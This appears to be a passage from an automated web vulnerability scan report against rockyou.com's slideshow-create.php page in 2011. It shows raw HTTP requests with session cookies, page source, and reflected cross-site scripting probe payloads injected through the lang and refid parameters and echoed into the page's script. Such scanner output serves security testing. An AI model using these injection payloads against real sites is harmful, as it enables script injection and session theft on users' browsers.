new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid='%22%3E%3Cnet%20sparker=netsparker(0x001215)%3E&create=1&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(t..
Date: Mon, 18 Apr 2011 22:14:53 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:14:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303164893; expires=Wed, 27-Jul-2011 22:14:53 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:14:53 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=43900 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26933
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid='%22%3E%3Cnet%20sparker=netsparker(0x001215)%3E&create=1&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(t..
|
- /slideshow-create.php
/slideshow-create.php |
Parameters
| Parameter | Type | Value |
| lang | GET | '"><net sparker=alert(0x0014B2)> |
| refid | GET | 3 |
Request
GET /slideshow-create.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x0014B2)%3E&refid=3 HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165002; ctid=2; sns_type=rockyou.com; istack=158777088%7Cwww202.rockyou.com%7C%7C158777089%7Cwww202.rockyou.com%7C%7C158777090%7Cwww202.rockyou.com%7C%7C158777091%7Cwww202.rockyou.com%7C%7C158777092%7Cwww202.rockyou.com%7C%7C158777098%7Cwww202.rockyou.com%7C%7C158777099%7Cwww202.rockyou.com%7C%7C158777100%7Cwww202.rockyou.com%7C%7C158777107%7Cwww202.rockyou.com%7C%7C158777119%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165002; ctid=2; sns_type=rockyou.com; istack=158777088%7Cwww202.rockyou.com%7C%7C158777089%7Cwww202.rockyou.com%7C%7C158777090%7Cwww202.rockyou.com%7C%7C158777091%7Cwww202.rockyou.com%7C%7C158777092%7Cwww202.rockyou.com%7C%7C158777098%7Cwww202.rockyou.com%7C%7C158777099%7Cwww202.rockyou.com%7C%7C158777100%7Cwww202.rockyou.com%7C%7C158777107%7Cwww202.rockyou.com%7C%7C158777119%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:16:42 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:16:41 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:16:42 GMT; path=/; domain=.rockyou.com,lastlogin=1303165002; expires=Wed, 27-Jul-2011 22:16:42 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:16:42 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=26422 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26856
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = 